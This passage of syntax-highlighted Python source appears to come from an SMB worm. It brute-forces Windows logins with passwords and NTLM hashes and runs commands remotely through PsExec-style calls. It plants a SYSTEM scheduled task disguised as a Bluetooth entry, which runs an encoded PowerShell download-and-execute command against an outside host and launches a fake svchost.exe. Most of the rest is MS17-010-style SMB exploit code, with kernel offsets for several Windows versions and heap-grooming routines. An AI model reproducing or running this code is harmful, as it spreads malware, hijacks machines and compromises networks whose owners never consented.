            <span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">domainlist</span><span class="p">:</span>
                <span class="k">if</span> <span class="n">PSEXEC</span><span class="p">(</span><span class="n">ee2</span><span class="p">,</span> <span class="n">dl</span><span class="p">,</span> <span class="s">'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&amp;&amp;c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe'</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">fr</span><span class="p">).</span><span class="n">run</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
                    <span class="k">print</span> <span class="s">'SMB Succ!'</span>
                    <span class="k">return</span>


<span class="k">def</span> <span class="nf">validate2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">fr</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">ntlist</span>
    <span class="k">for</span> <span class="n">u</span> <span class="ow">in</span> <span class="n">userlist2</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">domainlist</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">ntlist</span><span class="p">:</span>
                <span class="k">if</span> <span class="n">PSEXEC</span><span class="p">(</span><span class="n">ee2</span><span class="p">,</span> <span class="n">dl</span><span class="p">,</span> <span class="s">'cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "</span><span class="se">\\</span><span class="s">Microsoft</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&amp;&amp;c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">svchost.exe'</span><span class="p">,</span> <span class="n">u</span><span class="p">,</span> <span class="s">''</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">fr</span><span class="p">,</span> <span class="s">'00000000000000000000000000000000:'</span> <span class="o">+</span> <span class="n">n</span><span class="p">).</span><span class="n">run</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
                    <span class="k">print</span> <span class="s">'SMB Succ!'</span>
                    <span class="k">return</span>


<span class="k">def</span> <span class="nf">scansmb</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">semaphore1</span>
    <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">scan</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'exp IP:'</span> <span class="o">+</span> <span class="n">ip</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">validate</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'1'</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

            <span class="k">try</span><span class="p">:</span>
                <span class="n">check_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

            <span class="k">try</span><span class="p">:</span>
                <span class="n">validate2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'3'</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

    <span class="n">semaphore1</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">scansmb2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">scan2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">'exp IP:'</span> <span class="o">+</span> <span class="n">ip</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">validate</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'2'</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>

        <span class="k">try</span><span class="p">:</span>
            <span class="n">check_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>

        <span class="k">try</span><span class="p">:</span>
            <span class="n">validate2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'2'</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>

    <span class="n">semaphore1</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">scansmb3</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">p</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">semaphore2</span>
    <span class="k">if</span> <span class="n">scan3</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">445</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">scan3</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">65533</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">'exp IP:'</span> <span class="o">+</span> <span class="n">ip</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">validate</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'2'</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

            <span class="k">try</span><span class="p">:</span>
                <span class="n">check_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

            <span class="k">try</span><span class="p">:</span>
                <span class="n">validate2</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">'3'</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>

    <span class="n">semaphore2</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>


<span class="n">WIN7_64_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">160</span><span class="p">,</span> <span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">186</span><span class="p">,</span> <span class="s">'FAKE_SECCTX'</span><span class="p">:</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQQIIB'</span><span class="p">,</span> <span class="mi">2621994</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="s">'SECCTX_SIZE'</span><span class="p">:</span> <span class="mi">40</span><span class="p">}</span>
<span class="n">WIN7_32_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">128</span><span class="p">,</span> <span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">150</span><span class="p">,</span> <span class="s">'FAKE_SECCTX'</span><span class="p">:</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIIIIIB'</span><span class="p">,</span> <span class="mi">1835562</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="s">'SECCTX_SIZE'</span><span class="p">:</span> <span class="mi">28</span><span class="p">}</span>
<span class="n">WIN8_64_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">176</span><span class="p">,</span> <span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">202</span><span class="p">,</span> <span class="s">'FAKE_SECCTX'</span><span class="p">:</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIQQQQIIB'</span><span class="p">,</span> <span class="mi">3670570</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="s">'SECCTX_SIZE'</span><span class="p">:</span> <span class="mi">56</span><span class="p">}</span>
<span class="n">WIN8_32_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">136</span><span class="p">,</span> <span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">158</span><span class="p">,</span> <span class="s">'FAKE_SECCTX'</span><span class="p">:</span> <span class="p">(</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;IIIIIIIIB'</span><span class="p">,</span> <span class="mi">2359850</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="s">'SECCTX_SIZE'</span><span class="p">:</span> <span class="mi">36</span><span class="p">}</span>
<span class="n">WIN2K3_64_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">186</span><span class="p">,</span> <span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">160</span><span class="p">,</span> <span class="s">'SECCTX_PCTXTHANDLE_OFFSET'</span><span class="p">:</span> <span class="mi">16</span><span class="p">,</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span><span class="p">:</span> <span class="mi">64</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_CNT_OFFSET'</span><span class="p">:</span> <span class="mi">76</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET'</span><span class="p">:</span> <span class="mi">104</span><span class="p">}</span>
<span class="n">WIN2K3_32_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">150</span><span class="p">,</span> <span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">128</span><span class="p">,</span> <span class="s">'SECCTX_PCTXTHANDLE_OFFSET'</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span><span class="p">:</span> <span class="mi">36</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_CNT_OFFSET'</span><span class="p">:</span> <span class="mi">76</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET'</span><span class="p">:</span> <span class="mi">104</span><span class="p">}</span>
<span class="n">WINXP_32_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">148</span><span class="p">,</span> <span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">132</span><span class="p">,</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span><span class="p">:</span> <span class="mi">36</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_CNT_OFFSET'</span><span class="p">:</span> <span class="mi">76</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET'</span><span class="p">:</span> <span class="mi">104</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'</span><span class="p">:</span> <span class="mi">64</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'</span><span class="p">:</span> <span class="mi">92</span><span class="p">}</span>
<span class="n">WIN2K_32_SESSION_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'SESSION_ISNULL_OFFSET'</span><span class="p">:</span> <span class="mi">148</span><span class="p">,</span> <span class="s">'SESSION_SECCTX_OFFSET'</span><span class="p">:</span> <span class="mi">132</span><span class="p">,</span> <span class="s">'PCTXTHANDLE_TOKEN_OFFSET'</span><span class="p">:</span> <span class="mi">36</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_CNT_OFFSET'</span><span class="p">:</span> <span class="mi">60</span><span class="p">,</span> <span class="s">'TOKEN_USER_GROUP_ADDR_OFFSET'</span><span class="p">:</span> <span class="mi">88</span><span class="p">}</span>
<span class="n">WIN7_32_TRANS_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'TRANS_SIZE'</span><span class="p">:</span> <span class="mi">160</span><span class="p">,</span> <span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">:</span> <span class="mi">24</span><span class="p">,</span> <span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">64</span><span class="p">,</span> <span class="s">'TRANS_OUTPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">68</span><span class="p">,</span> <span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">:</span> <span class="mi">72</span><span class="p">,</span> <span class="s">'TRANS_OUTDATA_OFFSET'</span><span class="p">:</span> <span class="mi">76</span><span class="p">,</span> <span class="s">'TRANS_PARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">88</span><span class="p">,</span> <span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">92</span><span class="p">,</span> <span class="s">'TRANS_FUNCTION_OFFSET'</span><span class="p">:</span> <span class="mi">114</span><span class="p">,</span> <span class="s">'TRANS_MID_OFFSET'</span><span class="p">:</span> <span class="mi">128</span><span class="p">}</span>
<span class="n">WIN7_64_TRANS_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'TRANS_SIZE'</span><span class="p">:</span> <span class="mi">248</span><span class="p">,</span> <span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">:</span> <span class="mi">40</span><span class="p">,</span> <span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">112</span><span class="p">,</span> <span class="s">'TRANS_OUTPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">120</span><span class="p">,</span> <span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">:</span> <span class="mi">128</span><span class="p">,</span> <span class="s">'TRANS_OUTDATA_OFFSET'</span><span class="p">:</span> <span class="mi">136</span><span class="p">,</span> <span class="s">'TRANS_PARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">152</span><span class="p">,</span> <span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">156</span><span class="p">,</span> <span class="s">'TRANS_FUNCTION_OFFSET'</span><span class="p">:</span> <span class="mi">178</span><span class="p">,</span> <span class="s">'TRANS_MID_OFFSET'</span><span class="p">:</span> <span class="mi">192</span><span class="p">}</span>
<span class="n">WIN5_32_TRANS_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'TRANS_SIZE'</span><span class="p">:</span> <span class="mi">152</span><span class="p">,</span> <span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">:</span> <span class="mi">24</span><span class="p">,</span> <span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">60</span><span class="p">,</span> <span class="s">'TRANS_OUTPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">64</span><span class="p">,</span> <span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">:</span> <span class="mi">68</span><span class="p">,</span> <span class="s">'TRANS_OUTDATA_OFFSET'</span><span class="p">:</span> <span class="mi">72</span><span class="p">,</span> <span class="s">'TRANS_PARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">84</span><span class="p">,</span> <span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">88</span><span class="p">,</span> <span class="s">'TRANS_FUNCTION_OFFSET'</span><span class="p">:</span> <span class="mi">110</span><span class="p">,</span> <span class="s">'TRANS_PID_OFFSET'</span><span class="p">:</span> <span class="mi">120</span><span class="p">,</span> <span class="s">'TRANS_MID_OFFSET'</span><span class="p">:</span> <span class="mi">124</span><span class="p">}</span>
<span class="n">WIN5_64_TRANS_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'TRANS_SIZE'</span><span class="p">:</span> <span class="mi">224</span><span class="p">,</span> <span class="s">'TRANS_FLINK_OFFSET'</span><span class="p">:</span> <span class="mi">40</span><span class="p">,</span> <span class="s">'TRANS_INPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">104</span><span class="p">,</span> <span class="s">'TRANS_OUTPARAM_OFFSET'</span><span class="p">:</span> <span class="mi">112</span><span class="p">,</span> <span class="s">'TRANS_INDATA_OFFSET'</span><span class="p">:</span> <span class="mi">120</span><span class="p">,</span> <span class="s">'TRANS_OUTDATA_OFFSET'</span><span class="p">:</span> <span class="mi">128</span><span class="p">,</span> <span class="s">'TRANS_PARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">144</span><span class="p">,</span> <span class="s">'TRANS_TOTALPARAMCNT_OFFSET'</span><span class="p">:</span> <span class="mi">148</span><span class="p">,</span> <span class="s">'TRANS_FUNCTION_OFFSET'</span><span class="p">:</span> <span class="mi">170</span><span class="p">,</span> <span class="s">'TRANS_PID_OFFSET'</span><span class="p">:</span> <span class="mi">180</span><span class="p">,</span> <span class="s">'TRANS_MID_OFFSET'</span><span class="p">:</span> <span class="mi">184</span><span class="p">}</span>
<span class="n">X86_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'ARCH'</span><span class="p">:</span> <span class="s">'x86'</span><span class="p">,</span> <span class="s">'PTR_SIZE'</span><span class="p">:</span> <span class="mi">4</span><span class="p">,</span> <span class="s">'PTR_FMT'</span><span class="p">:</span> <span class="s">'I'</span><span class="p">,</span> <span class="s">'FRAG_TAG_OFFSET'</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span> <span class="s">'POOL_ALIGN'</span><span class="p">:</span> <span class="mi">8</span><span class="p">,</span> <span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">:</span> <span class="mi">8</span><span class="p">}</span>
<span class="n">X64_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'ARCH'</span><span class="p">:</span> <span class="s">'x64'</span><span class="p">,</span> <span class="s">'PTR_SIZE'</span><span class="p">:</span> <span class="mi">8</span><span class="p">,</span> <span class="s">'PTR_FMT'</span><span class="p">:</span> <span class="s">'Q'</span><span class="p">,</span> <span class="s">'FRAG_TAG_OFFSET'</span><span class="p">:</span> <span class="mi">20</span><span class="p">,</span> <span class="s">'POOL_ALIGN'</span><span class="p">:</span> <span class="mi">16</span><span class="p">,</span> <span class="s">'SRV_BUFHDR_SIZE'</span><span class="p">:</span> <span class="mi">16</span><span class="p">}</span>

<span class="k">def</span> <span class="nf">merge_dicts</span><span class="p">(</span><span class="o">*</span><span class="n">dict_args</span><span class="p">):</span>
    <span class="n">result</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">for</span> <span class="n">dictionary</span> <span class="ow">in</span> <span class="n">dict_args</span><span class="p">:</span>
        <span class="n">result</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">dictionary</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">result</span>


<span class="n">OS_ARCH_INFO</span> <span class="o">=</span> <span class="p">{</span><span class="s">'WIN7'</span><span class="p">:</span> <span class="p">{</span><span class="s">'x86'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X86_INFO</span><span class="p">,</span> <span class="n">WIN7_32_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN7_32_SESSION_INFO</span><span class="p">)),</span> <span class="s">'x64'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X64_INFO</span><span class="p">,</span> <span class="n">WIN7_64_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN7_64_SESSION_INFO</span><span class="p">))},</span> <span class="s">'WIN8'</span><span class="p">:</span> <span class="p">{</span><span class="s">'x86'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X86_INFO</span><span class="p">,</span> <span class="n">WIN7_32_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN8_32_SESSION_INFO</span><span class="p">)),</span> <span class="s">'x64'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X64_INFO</span><span class="p">,</span> <span class="n">WIN7_64_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN8_64_SESSION_INFO</span><span class="p">))},</span> <span class="s">'WINXP'</span><span class="p">:</span> <span class="p">{</span><span class="s">'x86'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X86_INFO</span><span class="p">,</span> <span class="n">WIN5_32_TRANS_INFO</span><span class="p">,</span> <span class="n">WINXP_32_SESSION_INFO</span><span class="p">)),</span> <span class="s">'x64'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X64_INFO</span><span class="p">,</span> <span class="n">WIN5_64_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN2K3_64_SESSION_INFO</span><span class="p">))},</span> <span class="s">'WIN2K3'</span><span class="p">:</span> <span class="p">{</span><span class="s">'x86'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X86_INFO</span><span class="p">,</span> <span class="n">WIN5_32_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN2K3_32_SESSION_INFO</span><span class="p">)),</span> <span class="s">'x64'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X64_INFO</span><span class="p">,</span> <span class="n">WIN5_64_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN2K3_64_SESSION_INFO</span><span class="p">))},</span> <span class="s">'WIN2K'</span><span class="p">:</span> <span class="p">{</span><span class="s">'x86'</span><span class="p">:</span> <span class="p">(</span><span class="n">merge_dicts</span><span class="p">(</span><span class="n">X86_INFO</span><span class="p">,</span> <span class="n">WIN5_32_TRANS_INFO</span><span class="p">,</span> <span class="n">WIN2K_32_SESSION_INFO</span><span class="p">))}}</span>
<span class="n">TRANS_NAME_LEN</span> <span class="o">=</span> <span class="mi">4</span>
<span class="n">HEAP_HDR_SIZE</span> <span class="o">=</span> <span class="mi">8</span>

<span class="k">def</span> <span class="nf">calc_alloc_size</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">align_size</span><span class="p">):</span>
    <span class="k">return</span> <span class="n">size</span> <span class="o">+</span> <span class="n">align_size</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">&amp;</span> <span class="o">~</span><span class="p">(</span><span class="n">align_size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">wait_for_request_processed</span><span class="p">(</span><span class="n">conn</span><span class="p">):</span>
    <span class="n">conn</span><span class="p">.</span><span class="n">send_echo</span><span class="p">(</span><span class="s">'a'</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">find_named_pipe</span><span class="p">(</span><span class="n">conn</span><span class="p">):</span>
    <span class="n">pipes</span> <span class="o">=</span> <span class="p">[</span><span class="s">'browser'</span><span class="p">,</span> <span class="s">'spoolss'</span><span class="p">,</span> <span class="s">'netlogon'</span><span class="p">,</span> <span class="s">'lsarpc'</span><span class="p">,</span> <span class="s">'samr'</span><span class="p">]</span>
    <span class="n">tid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">tree_connect_andx</span><span class="p">(</span><span class="s">'</span><span class="se">\\\\</span><span class="s">'</span> <span class="o">+</span> <span class="n">conn</span><span class="p">.</span><span class="n">get_remote_host</span><span class="p">()</span> <span class="o">+</span> <span class="s">'</span><span class="se">\\</span><span class="s">'</span> <span class="o">+</span> <span class="s">'IPC$'</span><span class="p">)</span>
    <span class="n">found_pipe</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="k">for</span> <span class="n">pipe</span> <span class="ow">in</span> <span class="n">pipes</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">fid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">nt_create_andx</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">)</span>
            <span class="n">conn</span><span class="p">.</span><span class="n">close</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">)</span>
            <span class="n">found_pipe</span> <span class="o">=</span> <span class="n">pipe</span>
            <span class="k">break</span>
        <span class="k">except</span> <span class="n">smb</span><span class="p">.</span><span class="n">SessionError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">pass</span>

    <span class="n">conn</span><span class="p">.</span><span class="n">disconnect_tree</span><span class="p">(</span><span class="n">tid</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">found_pipe</span>


<span class="n">special_mid</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">extra_last_mid</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">reset_extra_mid</span><span class="p">(</span><span class="n">conn</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">extra_last_mid</span>
    <span class="k">global</span> <span class="n">special_mid</span>
    <span class="n">special_mid</span> <span class="o">=</span> <span class="p">(</span><span class="n">conn</span><span class="p">.</span><span class="n">next_mid</span><span class="p">()</span> <span class="o">&amp;</span> <span class="mi">65280</span><span class="p">)</span> <span class="o">-</span> <span class="mi">256</span>
    <span class="n">extra_last_mid</span> <span class="o">=</span> <span class="n">special_mid</span>


<span class="k">def</span> <span class="nf">next_extra_mid</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">extra_last_mid</span>
    <span class="n">extra_last_mid</span> <span class="o">+=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">extra_last_mid</span>


<span class="n">GROOM_TRANS_SIZE</span> <span class="o">=</span> <span class="mi">20496</span>

<span class="k">def</span> <span class="nf">leak_frag_size</span><span class="p">(</span><span class="n">conn</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">fid</span><span class="p">):</span>
    <span class="n">info</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="n">mid</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">next_mid</span><span class="p">()</span>
    <span class="n">req1</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">create_nt_trans_packet</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span> <span class="n">param</span><span class="o">=</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;HH'</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="n">mid</span><span class="o">=</span><span class="n">mid</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'A'</span> <span class="o">*</span> <span class="mi">4304</span><span class="p">,</span> <span class="n">maxParameterCount</span><span class="o">=</span><span class="n">GROOM_TRANS_SIZE</span> <span class="o">-</span> <span class="mi">4304</span> <span class="o">-</span> <span class="n">TRANS_NAME_LEN</span><span class="p">)</span>
    <span class="n">req2</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">create_nt_trans_secondary_packet</span><span class="p">(</span><span class="n">mid</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="s">'B'</span> <span class="o">*</span> <span class="mi">276</span><span class="p">)</span>
